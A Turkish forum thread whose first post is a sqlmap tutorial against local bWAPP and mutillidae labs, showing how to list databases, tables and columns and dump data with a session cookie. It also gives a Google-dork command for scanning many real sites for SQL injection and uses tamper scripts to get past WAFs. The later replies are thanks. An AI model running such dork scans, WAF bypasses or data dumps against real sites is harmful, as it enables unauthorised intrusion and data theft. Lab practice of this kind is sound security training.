18 Mayıs 2021, 10:04 | #1 | ||||||
Linux SqlMap Kullanımı.
Sqlmap sql injection açıkları için geliştirilmiş çok ileri seviye bir araçtır. Python diliyle yazılmıştır. Sqlmap başlı başına ayrı bir kitap konusu bu yüzden biz genel olarak basit bir şekilde kullanımını ve bir kaç modülünü göreceğiz. Sqlmap, sqlmap [parametreler] şeklinde kullanılır. Bilgi ve yardım için -h parametresini kullanabilirsiniz. İleri düzey parametreler için - hh komutu ile öğrenebilir ve bilgi alabilirsiniz. Komut: Kodsqlmap -hh Temel olarak tüm bağlantılarda kullanacağımız temel komut aşağıdaki gibidir. Komut: Kodsqlmap -u “hedefsite.com/index.php?id=” --dbs Dork: Alıntı:
Kodsqlmap -u "inurl:news.php?id=" Burada verdiğimiz dork ile tek tek siteleri çekip ve çekilen sitede sql açığı olup olmadığını bizlere soruyor. Eğer hedef bağlantıda sql inj. açığı mevcut değil ise bir sonraki siteye geçer ve her site için kontrol edilip edilmeyeceğini bize sorar. Hedef Site: Alıntı:
Sql injection olan ilk soruyu açtığımızda bir arama formu çıkıp “’” meta karakteri ile hatayı aldık. şekilde görüldüğü gibi hatamızı aldık. Bunu sqlmap vasıtasıyla verileri çekelim. Sql inj. ile verileri çekmeden önce kurduğumuz sistem kullanıcı girişi yapıldıktan sonra sql inj. tespit edilmiştir. Bundan yola çıkarak sqlmap direk sisteme erişim sağlayamacağı için sqlmap’e cookieleri girmemiz gerekmektedir. Cookieleri çekmek için herhangi bir cookie editör kullanabilirsiniz. Cookie: Alıntı:
Alıntı:
Komut: Kodsqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' --dbs Veritabanını çektik sıra tablolarda –tables parametreleri ile çekilir. Komut: Kodsqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP --tables bWAPP adlı veritabanındaki tabloları çekmiş olduk. Kolonları çekmek için –columns parametresi kullanılır. Komut: Kodsqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog --columns Alıntı:
Komut: Kodsqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog -C id,date --dump Dosya Yolu: Alıntı:
Hedef sistemde sql injectin varsa bile ve hedef sistemde waf olması durumlarda Waf Bypass scriptleri kullanılmaktadır. Bu scriptlere genel olarak tamper denilmektedir. Tamper scriptleri SqlMap’ın kurulu olduğu dizin altındaki tamper klasöründe bulunmaktadır. Komut: Kodcd /usr/share/sqlmap/tamper ls Tamper scriptleri python ile yazılmış olup tüm scriptlerin neler yapabileceğini öğrenmek isterseniz biraz programlama dili biliyorsanız scriptleride anlıyabilirsiniz. –tamper parametresi ile kullanılmaktadır. Bir örnek ile gösterecek olursak; Örnek: Kodsqlmap -u http://localhost/lab/mutillidae/index.php?page=user-info.php&username=%27&password=bug&user-info-php-submit-button=View+Account+Details --dbs --tamper=space2comment Kaynak: Kali Linux Sayfa 142 |
|||||||
|
18 Mayıs 2021, 10:07 | #2 |
okuyup okuyup hicbir sey anlamiyorum resmen bu islerle ilgilenenlere helal olsun paylasim icin tesekkürler emegine saglik
________________
Hope. . . ✨
|
|
|
18 Mayıs 2021, 10:14 | #3 |
Emeğine sağlık
@[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
|
|
|
18 Mayıs 2021, 11:10 | #4 |
Emeğinize sağlık
________________
bazen insanlar iyilesmek istemez.
cünkü , icindeki acı sevdiklerinin son hatirasidir.. per aspera ad astra ✨ |
|
|
18 Mayıs 2021, 11:11 | #5 |
Emeğine sağlık teşekkür ederiz konu için.
________________
~ E & B ~ |
|
|
Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
|
|